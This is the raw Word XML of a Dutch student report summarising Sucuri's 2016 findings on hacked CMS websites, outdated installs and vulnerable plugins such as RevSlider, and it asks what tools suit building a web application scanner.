                  <wp:posOffset>-918210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1138851</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="753" name="Rectangle 75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C4F3C" id="Rectangle 753" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.3pt;margin-top:-89.6pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B46E2" w:rsidRPr="009B46E2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Securi Rapport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D89C2C0" w14:textId="0B858A39" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Er zijn ongeveer</w:t>
      </w:r>
      <w:r w:rsidR="00C942D8">
        <w:t xml:space="preserve"> 1 miljard websites online en het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aantal blijft maar stijgen. De kra</w:t>
      </w:r>
      <w:r w:rsidR="00581801">
        <w:t xml:space="preserve">cht achter deze stijging </w:t>
      </w:r>
      <w:r>
        <w:t>zijn Content Management Systemen (CMS). Deze technologieën maken het mogelijk om gemakkelijk een simpele website op te zetten, het enige wat een persoon nodig heeft is een host en een installatie van één van de grote CMS systemen, deze zijn: WordPress, Joomla, Drupal en Magento. Om het nog makkelijker te maken bieden sommige host als Digital</w:t>
      </w:r>
      <w:r w:rsidR="00C90615">
        <w:t xml:space="preserve"> Ocean een geautomatiseerde CMS-</w:t>
      </w:r>
      <w:r>
        <w:t>inst</w:t>
      </w:r>
      <w:r w:rsidR="00C76D38">
        <w:t>allatie aan. De explosie van CMS</w:t>
      </w:r>
      <w:r w:rsidR="00DC2FE3">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>technologieën heeft ervoor gezorgd dat een derde van alle websites aangedreven</w:t>
      </w:r>
      <w:r w:rsidR="00DC2FE3">
        <w:t xml:space="preserve"> wordt</w:t>
      </w:r>
      <w:r w:rsidR="00581801">
        <w:t xml:space="preserve"> door zulke soort CMS-</w:t>
      </w:r>
      <w:r>
        <w:t>applicaties. Wo</w:t>
      </w:r>
      <w:r w:rsidR="00581801">
        <w:t>rdpress leidt met 60% op de CMS-</w:t>
      </w:r>
      <w:r>
        <w:t>markt en heeft dus de gr</w:t>
      </w:r>
      <w:r w:rsidR="00581801">
        <w:t>ootste marktaandeel. Andere CMS-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">platforms </w:t>
      </w:r>
      <w:r w:rsidR="00581801">
        <w:t>concentreren zich meer op niche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">markten zoals Magento voor e-commerce en Drupal voor grote bedrijfssystemen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901250E" w14:textId="6157CDF0" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Elke particulier kan een host en domein kopen en daar een WordPress, Magento of Drupal instantie op instaleren. Sucuri noemt dit fenomeen User A</w:t>
      </w:r>
      <w:r w:rsidRPr="0087653F">
        <w:t>doption</w:t>
      </w:r>
      <w:r w:rsidR="00C90615">
        <w:t xml:space="preserve">, dit zorgt voor </w:t>
      </w:r>
      <w:r>
        <w:t>een grote vloed aan ong</w:t>
      </w:r>
      <w:r w:rsidR="00C90615">
        <w:t>eschoolde webmasters en service</w:t>
      </w:r>
      <w:r>
        <w:t>providers</w:t>
      </w:r>
      <w:r w:rsidR="00C90615">
        <w:t xml:space="preserve"> die</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> verantwoordelijk zijn voor het ontwikkelen en onderhouden van websites. Dat blijkt uit de analyse die Sucuri in het eerste kwartaal van 2016 heeft gedaan, waarin vermeld wordt dat uit de 11,000 geïnfecteerde websites die geanalyseerd zijn, 75% gebruik maken van de platform WordPress. Wat ook een groot probleem blijkt te zijn is het updaten van CMS platformen en dit komt mededankzij de ongeschoolde, onervaren webmasters die liever geen tijd besteden aan het onderhouden van hun websites. Er wordt geschat dat 50% van WordPress website niet up-to-date zijn en voor CMS platformen die minder nadruk leggen op compatibiliteit met eerdere versies is het percentage nog hoger, 80%. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF753BD" w14:textId="51EC2B8C" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Voor het eerste kwartaal van 2016 heeft Sucuri een aantal CMS platformen geanalyseerd op kwetsbaarheden binnen het systeem. Het resultaat van Sucuri’s</w:t>
      </w:r>
      <w:r w:rsidR="002B3611">
        <w:t xml:space="preserve"> onderzoek</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> laat zien dat de drie meest geïnfecteerde CMS</w:t>
      </w:r>
      <w:r w:rsidR="002B3611">
        <w:t xml:space="preserve">- platformen </w:t>
      </w:r>
      <w:r>
        <w:t>WordPress, Joombla en Ma</w:t>
      </w:r>
      <w:r w:rsidR="002B3611">
        <w:t xml:space="preserve">gento zijn. Tijdens de kwetsbaarheid </w:t>
      </w:r>
      <w:r>
        <w:t>analyse is er meer naar de installatie, configuratie, en algemene onderhoudt</w:t>
      </w:r>
      <w:r w:rsidR="002B3611">
        <w:t xml:space="preserve"> gekeken </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dan de kern van de CMS platformen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5468B4" w14:textId="49360DF7" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A53060" wp14:editId="3FB1D505">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="679"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5DC56E" w14:textId="77777777" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB"/>
    <w:p w14:paraId="63E1AD22" w14:textId="77777777" w:rsidR="00AD3BA3" w:rsidRDefault="00AD3BA3" w:rsidP="00B84DAB"/>
    <w:p w14:paraId="6C0F5C2C" w14:textId="77777777" w:rsidR="00F27A73" w:rsidRDefault="00F27A73" w:rsidP="00B84DAB"/>
    <w:p w14:paraId="435A2FB1" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00B84DAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E480EC" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00B84DAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A32E5F4" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00B84DAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DACA42B" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00B84DAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1323005B" w14:textId="77777777" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00B84DAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDA2032" w14:textId="3CEF9D42" w:rsidR="009B46E2" w:rsidRPr="009B46E2" w:rsidRDefault="00F27A73" w:rsidP="00B84DAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253193216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F198C1A" wp14:editId="38594810">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-909651</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1254377</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="756" name="Rectangle 75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04C03" id="Rectangle 756" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.65pt;margin-top:-98.7pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#70ad47 [3209]" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B46E2" w:rsidRPr="009B46E2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Out-of-date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F785A6A" w14:textId="73A6D5F9" w:rsidR="00B84DAB" w:rsidRDefault="001F4EE1" w:rsidP="00B84DAB">
      <w:r>
        <w:t>CMS-platformen moedigen software-</w:t>
      </w:r>
      <w:r w:rsidR="00B84DAB">
        <w:t>ontwikkelaars aan om extensies te maken om nieuwe features aan de systemen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> toe te voegen. Maar wat de CMS-</w:t>
      </w:r>
      <w:r w:rsidR="00B84DAB">
        <w:t>platformen niet willen zijn extensies met kwetsbaarheden, jammer genoeg is hier niet voldoende zicht op en wordt er niet veel aan kwaliteit controle gedaan. Dit zorgt ervoor dat de meeste kwetsbaarheden te vinden zijn in extensies. Er kunnen kwetsbaarheden te vi</w:t>
      </w:r>
      <w:r>
        <w:t>nden zijn in de kern van de CMS-</w:t>
      </w:r>
      <w:r w:rsidR="00B84DAB">
        <w:t>systemen maar, deze zijn nog te onderhouden door het uitgeven van pa</w:t>
      </w:r>
      <w:r>
        <w:t>tches, mits de webmaster de CMS-</w:t>
      </w:r>
      <w:r w:rsidR="00B84DAB">
        <w:t>systeem niet up-to-date houdt. Extensies kunnen door i</w:t>
      </w:r>
      <w:r>
        <w:t>edereen met een beetje software-</w:t>
      </w:r>
      <w:r w:rsidR="00B84DAB">
        <w:t>ontwikkeling ken</w:t>
      </w:r>
      <w:r>
        <w:t>nis gemaakt worden. De security</w:t>
      </w:r>
      <w:r w:rsidR="00B84DAB">
        <w:t>problemen ontstaan wanneer ongeschoolde, oner</w:t>
      </w:r>
      <w:r>
        <w:t>varen software-</w:t>
      </w:r>
      <w:r w:rsidR="00B84DAB">
        <w:t>ontwikkelaars zwak beveil</w:t>
      </w:r>
      <w:r>
        <w:t>igde software vrijgeven als CMS-</w:t>
      </w:r>
      <w:r w:rsidR="00B84DAB">
        <w:t xml:space="preserve">extensies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57316FC5" w14:textId="55555721" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>De drie extensies die de meeste websites hebben geïnfecteerd met kwetsbaarheden zijn RevSlider, GravityForms, en TimThumb. In 2014 heeft Sucuri een onderzoek gedaan naar de RevSlider en een artikel gepubliceerd dat er meer dan 100,000 websites getroffen zijn door een malware die zijn aanval richt op d</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE1">
        <w:t>e plugin RevSlider. Het security</w:t>
      </w:r>
      <w:r>
        <w:t>probleem doet zich voor in de Premium versie van de RevSlider. De kwetsbaarheid zorgt ervoor d</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE1">
        <w:t>at hackers elk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bestand van de server kan downloaden. Dit wordt vooral gebruikt om inloggegevens te stelen van de database. Gebruikers moeten voorzichtig zijn bij het gebruiken van derde partij plugins en goed onderzoek doen naar rapporten die geschreven zijn over de plugins op gebied van security. Zo kunnen zij voorkomen dat zij een doelwit worden voor cyberaanvallen van hackers. Magento maakt ook gebruik van derde partij plugins en doet blijkbaar ook niet genoeg aan kwaliteit controle. De Magento extensie ShopLift Supee is een ander voorbeeld van een kwetsbare extensie. Hackers gebruiken de exploiteer </w:t>
      </w:r>
      <w:r w:rsidR="001F4EE1">
        <w:t>technieken SQL Injecties en XSS-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aanvallen om administratie accounts toe te voegen aan het systeem.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E99BB8D" w14:textId="0A374B33" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Zoals nu duidelijk is zijn de extensies de meest voorkomende bron van kwetsbaarheden m</w:t>
      </w:r>
      <w:r w:rsidR="001F4EE1">
        <w:t xml:space="preserve">aar niet de enige. </w:t>
      </w:r>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00A63E53">
        <w:t xml:space="preserve">ackers vinden met genoeg tijd, </w:t>
      </w:r>
      <w:r>
        <w:t>motivatie en voorzieningen een manier om de software kwetsbaarheid te exploiteren</w:t>
      </w:r>
      <w:r w:rsidR="00FE13F0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEAB9DE" w14:textId="77777777" w:rsidR="00CC4F6B" w:rsidRDefault="00B84DAB" w:rsidP="00C94890">
      <w:pPr>
        <w:keepNext/>
        <w:sectPr w:rsidR="00CC4F6B" w:rsidSect="007B3BEE">
          <w:headerReference w:type="default" r:id="rId25"/>
          <w:headerReference w:type="first" r:id="rId26"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1661E0" wp14:editId="044497BC">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="706"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AF653C" w14:textId="479FA81C" w:rsidR="00241096" w:rsidRDefault="00241096" w:rsidP="00C94890">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253186048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BD27E9C" wp14:editId="208BDFFC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10732135" cy="7576185"/>
            <wp:effectExtent l="0" t="0" r="1206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1920 – 1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10732135" cy="7576185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="530122D9" w14:textId="3B3D7F97" w:rsidR="00241096" w:rsidRDefault="00241096">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253187072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F15B66A" wp14:editId="04488373">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10668635" cy="7576185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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Web 1920 – 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10668635" cy="7576185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E8199" w14:textId="77777777" w:rsidR="00905AD1" w:rsidRPr="00241096" w:rsidRDefault="00905AD1" w:rsidP="00241096">
      <w:pPr>
        <w:sectPr w:rsidR="00905AD1" w:rsidRPr="00241096" w:rsidSect="004D5383">
          <w:headerReference w:type="first" r:id="rId30"/>
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318695B4" w14:textId="009DA70C" w:rsidR="0080388C" w:rsidRPr="004A7280" w:rsidRDefault="004D5383" w:rsidP="00C94890">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1020"/>
        </w:tabs>
        <w:sectPr w:rsidR="0080388C" w:rsidRPr="004A7280" w:rsidSect="004D5383">
          <w:headerReference w:type="first" r:id="rId31"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="0"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334080" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00F016DE" wp14:editId="5148AFB0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-330200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3275965</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5334635" cy="1483360"/>
                <wp:effectExtent l="0" t="0" r="24765" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="561" name="Rounded Rectangle 56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87ADE" id="Rounded Rectangle 561" o:spid="_x0000_s1026" style="position:absolute;margin-left:-26pt;margin-top:257.95pt;width:420.05pt;height:116.8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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252267520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02BB8540" wp14:editId="73A6639F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-207645</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3503930</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4699635" cy="102806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699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85849B0" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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8540" id="Text Box 55" o:spid="_x0000_s1043" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16.35pt;margin-top:275.9pt;width:370.05pt;height:80.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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="685849B0" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253173760" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D06D361" wp14:editId="719B7362">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-340995</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5219700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5569585" cy="1713230"/>
                <wp:effectExtent l="0" t="0" r="18415" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="778" name="Rounded Rectangle 778"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5569585" cy="171323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E2576" id="Rounded Rectangle 778" o:spid="_x0000_s1026" style="position:absolute;margin-left:-26.85pt;margin-top:411pt;width:438.55pt;height:134.9pt;z-index:-2501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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253172736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23E9854F" wp14:editId="17FD75C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-144145</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5449570</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5080635" cy="1252855"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="776" name="Text Box 776"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5080635" cy="125285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C569A10" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5" w:rsidP="006E374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1613626" w14:textId="2BC178F5" w:rsidR="002A05E5" w:rsidRPr="006E3740" w:rsidRDefault="002A05E5" w:rsidP="006E3740">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="52"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="006E3740">
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>Wat zijn de tools en technieken die ik kan gebruiken bij het ontwikkelen van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854F" id="Text Box 776" o:spid="_x0000_s1044" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-11.35pt;margin-top:429.1pt;width:400.05pt;height:98.6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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6C569A10" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00435E58" w:rsidRDefault="002A05E5" w:rsidP="006E374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1613626" w14:textId="2BC178F5" w:rsidR="002A05E5" w:rsidRPr="006E3740" w:rsidRDefault="002A05E5" w:rsidP="006E3740">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="52"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="006E3740">
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Wat zijn de tools en technieken die ik kan gebruiken bij het ontwikkelen van een Webapplicatie scanner?</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252293120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4813F3E5" wp14:editId="17A5BFEE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-326390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1788160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3556635" cy="802640"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="205" name="Text Box 205"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="35566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5B74A" w14:textId="6D434390" w:rsidR="002A05E5" w:rsidRPr="00A14BEE" w:rsidRDefault="002A05E5"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F3E5" id="Text Box 205" o:spid="_x0000_s1045" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-25.7pt;margin-top:140.8pt;width:280.05pt;height:63.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" filled="f" stroked="f">
